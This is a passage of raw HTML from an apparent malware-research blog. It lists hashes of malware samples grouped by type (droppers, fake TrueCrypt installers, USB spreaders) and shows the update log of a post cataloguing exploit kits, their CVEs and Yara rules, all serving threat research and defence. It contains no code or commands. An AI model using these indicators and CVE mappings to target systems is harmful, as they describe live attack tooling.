<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">887a721254486263f1f3f25f3c677da62ef5c062c3afa7ef70c895bc8b17b424</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a35e48909a49334a7ebb5448a78dcff9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">945c594aee1b5bd0f3a72abe8f5a3df74fc6ca686887db5e40fe859e3fc90bb1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">502f35002b1a95f1ae135baff6cff836</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ab8d308fd59a8db8a130fcfdb6db56c4f7717877c465be98f71284bdfccdfa25</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a446ced5db1de877cf78f77741e2a804</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b22a614a291111398657cf8d1fa64fa50ed9c66c66a0b09d08c53972c6536766</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d939a05e1e3c9d7b6127d503c025dbc4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fcfdcbdd60f105af1362cfeb3decbbbbe09d5fc82bde6ee8dfd846b2b844f972</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14634d446471b9e2f55158d9ac09d0b2</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">DebugVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">910f55e1c4e75696405e158e40b55238d767730c60119539b644ef3e6bc32a5d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7263a328f0d47c76b4e103546b648484</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">DebugVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c821cb34c86ec259af37c389a8f6cd635d98753576c675882c9896025a1abc53</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bdc9255df5385f534fea83b497c371c8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">DebugVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f845778c3f2e3272145621776a90f662ee9344e3ae550c76f65fd954e7277d19</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5199fcd031987834ed3121fb316f4970</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4dcf14c41b31f8accf9683917bfc9159b9178d6fe36227195fabc232909452af</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">65f494580c95e10541d1f377c0a7bd49</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8bc189dee0a71b3a8a1767e95cc726e13808ed7d2e9546a9d6b6843cea5eb3bd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a4b0615cb639607e6905437dd900c059</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">048621ecf8f25133b2b09d512bb0fe15fc274ec7cb2ccc966aeb44d7a88beb5b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">07e99b2f572b84af5c4504c23f1653bb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aa23a93d2fed81daacb93ea7ad633426e04fcd063ff2ea6c0af5649c6cfa0385</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1927a80cd45f0d27b1ae034c11ddedb0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c66955f667e9045ea5591ebf9b59246ad86227f174ea817d1398815a292b8c88</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">579ad4a596602a10b7cf4659b6b6909d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppersfrompostalsites</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d6f126ab387f1d856672c730991573385c5746c7c84738ab97b13c897063ff4a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e64eb8b571f655b744c9154d8032caef</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">61dd8b60ac35e91771d9ed4f337cd63e0aa6d0a0c5a17bb28cac59b3c21c24a9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d755e52ba5658a639c778c22d1a906a3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4328b06093a4ad01f828dc837053cb058fe00f3a7fd5cfb9d1ff7feb7ebb8e32</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b4d909077aa25f31386722e716a5305c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">15760f0979f2ba1b4d991f19e8b59fc1e61632fcc88755a4d147c0f5d47965c5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fc4b285088413127b6d827656b9d0481</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b9c285f485421177e616a148410ddc5b02e43f0af375d3141b7e829f7d487bfd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">73e7ee83133a175b815059f1af79ab1b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cf3b0d8e9a7d0ad32351ade0c52de583b5ca2f72e5af4adbf638c81f4ad8fbcb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eebbcb1ed5f5606aec296168dee39166</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dropperswdecoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dbc1b98b1df1d9c2dc8a5635682ed44a91df6359264ed63370724afa9f19c7ee</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5a24a7370f35dbdbb81adf52e769a442</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptextractedexe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4c01ffcc90e6271374b34b252fefb5d6fffda29f6ad645a879a159f78e095979</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b64dbe5817b24d17a0404e9b2606ad96</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptextractedexe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5de8c04a77e37dc1860da490453085506f8aa378fbc7d811128694d8581b89ba</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7ca6101c2ae4838fbbd7ceb0b2354e43</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptextractedexe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">73aae05fab96290cabbe4b0ec561d2f6d79da71834509c4b1f4b9ae714159b42</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f64704ed25f4c728af996eee3ee85411</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptextractedexe</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c7212d249b5eb7e2cea948a173ce96e1d2b8c44dcc2bb1d101dce64bb3f5becc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c1f715ff0afc78af81d215d485cc235c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptSetup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">42028874fae37ad9dc89eb37149ecb1e6439869918309a07f056924c1b981def</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f34b77f7b2233ee6f727d59fb28f438a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptSetup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a3a43bbc69e24c0bc3ab06fbf3ccc35cf8687e2862f86fb0d269258b68c710c9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">babd17701cbe876149dc07e68ec7ca4f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptSetup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b8844e5b72971fe67d2905e77ddaa3366ae1c3bead92be6effd58691bc1ff8ec</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cfc8901fe6a9a8299087bfc73ae8909e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FakeTrueCryptSetup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">fe3547f0e052c71f872bf09cdc1654137ee68f878fc6d5a78df16a13e6de1768</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">83f3ec97a95595ebe40a75e94c98a7bd</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2de76a3c07344ce322151dbb42febdff97ade8176466a3af07e5280bd859a186</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">38e708fea8016520cb25d3cb933f2244</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4e88b8b121d768c611fe16ae1f008502b2191edc6f2ee84fef7b12b4d86fe000</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">360df4c2f2b99052c07e08edbe15ab2c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">29dfc81b400a1400782623c618cb1d507f5d17bb13de44f123a333093648048f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">89a3ea3967745e04199ebf222494452e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">97afe4b12a9fed40ad20ab191ba0a577f5a46cbfb307e118a7ae69d04adc2e2d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6ba88e8e74b12c914483c026ae92eb42</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">793a8ce811f423dfde47a5f44ae50e19e7e41ad055e56c7345927eac951e966b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">043f99a875424ca0023a21739dba51ef</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">904bb2efe661f654425e691b7748556e558a636d4f25c43af9d2d4dfbe83262e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">02d438df779affddaf02ca995c60cecb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b62589ee5ba94d15edcf8613e3d57255dd7a12fce6d2dbd660fd7281ce6234f4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">11b4e7ea6bae19a29343ae3ff3fb00ca</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d2c11706736fda2b178ac388206472fd8d050e0f13568c84b37683423acd155d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">27d74523b182ae630c4e5236897e11f3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">OtherDroppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1f61a0f9488be3925665f8063006f90fab1bf0bd0b6ff5f7799f8995ff8960e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1ab8d45656e245aca4e59aa0519f6ba0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1acae7c11fb559b81df5fc6d0df0fe502e87f674ca9f4aefc2d7d8f828ba7f5c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">76dda7ca15323fd658054e0550149b7b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3d78f52fa0c08d8bf3d42074bf76ee56aa233fb9a6bc76119998d085d94368ca</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ca1a3618088f91b8fb2a30c9a9aa4aca</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7d15bd854c1dfef847cdd3caabdf4ab81f2410ee5c7f91d377cc72eb81135ff4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a2bb01b764491dd61fa3a7ba5afc709c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">09c04206b57bb8582faffb37e4ebb6867a02492ffc08268bcbc717708d1a8919</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a59053cc3f66e72540634eb7895824ac</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">12bb18fa9a12cb89dea3733b342940b80cd453886390079cb4c2ffcd664baeda</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2bd0d2b5ee4e93717ea71445b102e38e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">34e6fb074284e58ca80961feda4fe651d6d658077914a528a4a6efa91ecc749d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">057028e46ea797834da401e4db7c860a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">90b20b1687909c2f76f750ba3fd4b14731ce736c08c3a8608d28eae3f4cd68f3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">514423670de210f13092d6cb8916748e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">93accb71bf4e776955756c76990298decfebe4b1dd9fbf9d368e81dc1cb9532d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">abb9f4fab64dd7a03574abdd1076b5ea</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">99a09ad92cc1a2564f3051057383cb6268893bc4a62903eabf3538c6bfb3aa9c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">542b00f903f945ad3a9291cb0af73446</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">339a5199e6d0b5f781b08b2ca0ad0495e75e52b8e2fd69e1d970388fbca7a0d6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a427ff7abb17af6cf5fb70c49e9bf4e1</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">340b09d661a6ac45af53c348a5c1846ad6323d34311e66454e46c1d38d53af8b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2646f7159e1723f089d63e08c8bfaffb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">461dd5a58ffcad9fffba9181e234f2e0149c8b8ba28c7ea53753c74fdfa0b0d5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">609abb2a86c324bbb9ba1e253595e573</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4688afcc161603bfa1c997b6d71b9618be96f9ff980e5486c451b1cc2c5076cb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ae552fc43f1ba8684655d8bf8c6af869</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7492e84a30e890ebe3ca5140ad547965cc8c43f0a02f66be153b038a73ee5314</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1234bf4f0f5debc800d85c1bd2255671</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">61862a55dcf8212ce9dd4a8f0c92447a6c7093681c592eb937a247e38c8109d4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e685ea8b37f707f3706d7281b8f6816a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">95631685006ac92b7eb0755274e2a36a3c9058cf462dd46f9f4f66e8d67b9db2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9179f4683ece450c1ac7a819b32bdb6d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b8b02cc57e45bcf500b433806e6a4f8af7f0ac0c5fc9adfd11820eebf4eb5d79</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cdc60eb93b594fb5e7e5895e2b441240</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e57eb9f7fdf3f0e90b1755d947f1fe7bb65e67308f1f4a8c25bc2946512934b7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">39b67cc6dae5214328022c44f28ced8b</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e3892d2d9f87ea848477529458d025898b24a6802eb4df13e96b0314334635d0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3813b848162261cc5982dd64c741b450</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">USBSpreaders</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1d7e36af4c30bf3d680c87bbc4430de282d00323bf8ae9e17b04862af286736</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35724e234f6258e601257fb219db9079</td></tr>
</tbody></table>
</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<br /></div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com1tag:blogger.com,1999:blog-7885177434994542510.post-30428900448167742182015-05-12T00:30:00.000-04:002015-05-13T00:05:32.557-04:00An Overview of Exploit Packs (Update 25) May 2015<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="background-color: white;">Update May 12, 2015</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Added </span>CVE-2015-0359 and updates for CVE-2015-0336<br />
<span style="background-color: white;"><br /></span>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">
<div>
<div style="text-align: center;">
<div style="margin: 0px;">
<span style="font-family: inherit; font-size: large;"><b> <a href="http://contagiodata.blogspot.com/2014/12/exploit-kits-2014.html">Exploit kit table 2014- 2015 (Sortable HTML table)</a></b></span></div>
</div>
</div>
<div>
<div style="text-align: center;">
<div style="margin: 0px;">
<b><br /></b><b><span style="background-color: white; border: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 19.6000003814697px; margin: 0px; padding: 0px; vertical-align: baseline;">Reference table : </span><span style="background-color: white; border: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 19.6000003814697px; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="https://docs.google.com/spreadsheet/ccc?key=0AjvsQV3iSLa1dE9EVGhjeUhvQTNReko3c2xhTmphLUE#gid=10" style="border: 0px; color: #660000; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exploit References 2014-2015</a></span></b></div>
<div style="margin: 0px;">
<b><br /></b></div>
<div style="margin: 0px;">
<b><br /></b></div>
<div style="margin: 0px;">
<b></b></div>
<a name='more'></a><div style="text-align: left;">
<span style="background-color: white;">Update March 20, 2015</span></div>
<div style="text-align: left;">
<span style="background-color: #fce5cd;"><br /></span>Added <span style="background-color: white;">CVE-2015-0336</span></div>
<div>
<span style="background-color: white;"><br /></span></div>
<div style="text-align: left;">
------------------------</div>
<b></b></div>
</div>
</div>
<span style="background-color: white;">Update February 19, 2015</span><br />
<br />
<span style="background-color: #fce5cd;"></span>
Added Hanjuan Exploit kit and <span style="background-color: white;">CVE-2015-3013 for Angler</span><span style="background-color: white;"> </span><br />
<div>
<div>
<div style="text-align: center;">
<br /></div>
</div>
</div>
<span style="background-color: white;">Update January 24, 2015 </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJcK8HbzueNTySfgyvcNrM-mXHEdDXiLS6nzQxkDz78KwlOL5EgmhxbnlIiNJBG9Z5QAlg8PuFLOCUZFBWtgZckXXVDNL0qcthsZNZjXDzq_3bumvqak8_-QtDoFKU8bVaafZTwDCrH8U/s1600/kahu.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJcK8HbzueNTySfgyvcNrM-mXHEdDXiLS6nzQxkDz78KwlOL5EgmhxbnlIiNJBG9Z5QAlg8PuFLOCUZFBWtgZckXXVDNL0qcthsZNZjXDzq_3bumvqak8_-QtDoFKU8bVaafZTwDCrH8U/s1600/kahu.PNG" width="141" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">http://www.kahusecurity.com</td></tr>
</tbody></table>
<span style="background-color: #fce5cd;"></span><br />
<span style="background-color: #fce5cd;"></span>
<span style="background-color: white;">Added CVE-2015-3010, </span><span style="background-color: white;">CVE-2015-3011 for Agler and a few reference articles. </span><br />
<span style="background-color: white;">If you notice any errors, or some CVE that need to be removed (were retired by the pack authors), please let me know. Thank you very much!</span><br />
<div style="text-align: center;">
<div style="text-align: left;">
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="text-align: left;">
<div style="text-align: center;">
<div style="margin: 0px;">
<br /></div>
</div>
</div>
</div>
<br />
Update December 12, 2014<br />
<div style="text-align: left;">
<br />
<br /></div>
<div>
<span style="background-color: white;">Update Jan 8, 2014</span><br />
<br />
This is version 20 of the exploit pack table - see the added exploit packs and vulnerabilities listed below.<br />
<div style="text-align: center;">
<br /></div>
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black; font-family: Arial, Helvetica, sans-serif; text-align: center;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: ghostwhite; color: white;"><a href="https://docs.google.com/spreadsheet/ccc?key=0AjvsQV3iSLa1dE9EVGhjeUhvQTNReko3c2xhTmphLUE&usp=drive_web#gid=0"> Exploit Pack Table Update 20 </a> </th></tr>
<tr><td style="border: 1px solid rgb(248, 248, 255); margin: 3px; padding: 4px;"> <a href="https://docs.google.com/spreadsheet/ccc?key=0AjvsQV3iSLa1dE9EVGhjeUhvQTNReko3c2xhTmphLUE&usp=drive_web#gid=0">Click to view or download from Google Apps</a></td></tr>
</tbody></table>
<br />
<b>I want to give special thanks to <a href="http://malware.dontneedcoffee.com/">Kafeine </a> L0NGC47, Fibon and Curt Shaffer for their help and update they made. Note the new Yara rules sheet / tab for yara rules for exploit kit.</b><br />
<b>I also want to thank <a href="http://www.kahusecurity.com/">Kahu security</a>, </b><b><a href="http://malware.dontneedcoffee.com/">Kafeine</a>, <a href="http://malforsec.blogspot.com/">Malforsec</a> and all security companies listed in References for their research.</b><br />
<br />
If you wish to be a contributor (be able to update/change the exploits or add yara rules), please contact me :)<br />
<span style="color: blue;">If you have additions or corrections, please <a href="mailto:milaparkour@gmail">email</a>, leave post comments, or tweet (@snowfl0w) < thank you!</span><br />
<br />
<span style="font-family: Times, 'Times New Roman', serif;">The Wild Wild West image was created by Kahu Security - It shows current and retired (retiring) kits.</span><br />
<br />
<a href="http://www.kahusecurity.com/wp-content/uploads/2013/12/wildwildwest_1213.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.kahusecurity.com/wp-content/uploads/2013/12/wildwildwest_1213.jpg" height="640" width="105" /></a><span style="font-family: Times, Times New Roman, serif;">List of changed kits</span><br />
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black;"><tbody>
